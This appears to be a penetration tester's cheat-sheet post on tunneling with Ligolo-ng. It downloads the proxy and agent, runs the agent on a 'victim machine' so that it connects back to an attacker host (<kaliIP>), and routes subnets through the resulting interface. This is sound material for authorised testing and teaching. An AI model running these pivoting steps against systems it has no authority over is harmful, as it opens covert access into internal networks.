Tunneling With Ligolo-Ng

Tunneling like a VPN

Description

I like to use Ligolo-ng for tunneling because it allows me to route traffic through an interface like a VPN instead of having to rely on a bunch of socks tunnels. It also works cross OS on both Linux and Windows and can be used in much the same way as a traditional C2 system, establishing sessions to victims and issuing commands. Ligolo-ng can be downloaded from Github and there is fairly extensive documentation found on the wiki.

The goal of this post is to essentially serve as a cheat sheet for the tool, providing the commands and scripts required to quickly and easily establish tunnels during engagements.

Commands

The commands below download the appropriate proxy server and agent files (make sure to use the same version and correct OS) then unzip the archives and give execute permissions to the linux server binary.

wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_windows_amd64.zip;
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz;
unzip ligolo-ng_agent_0.6.2_windows_amd64.zip;
tar xvf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz;
chmod +x proxy

Next the Ligolo-ng server must be started on the attacking host.

sudo ./proxy -selfcert

Copy the Ligolo-ng agent to victim machine and run it to establish a connection.

.\agent.exe -connect <kaliIP>:11601 -ignore-cert

Catch the created session and join it. Then create an interface and start the tunnel.

session
1
interface_create --name ligolo
tunnel_start --tun ligolo

Lastly, add a route(s) to the subnet(s) we are trying to reach, specify dev for device and then pass the name of the interface we created in Ligolo-ng.

sudo ip route add <subnet>/24 dev ligolo

Now a proxy tunnel should be correctly set up that will route all traffic destined for the subnet specified through Liogolo-ng and the victim machine.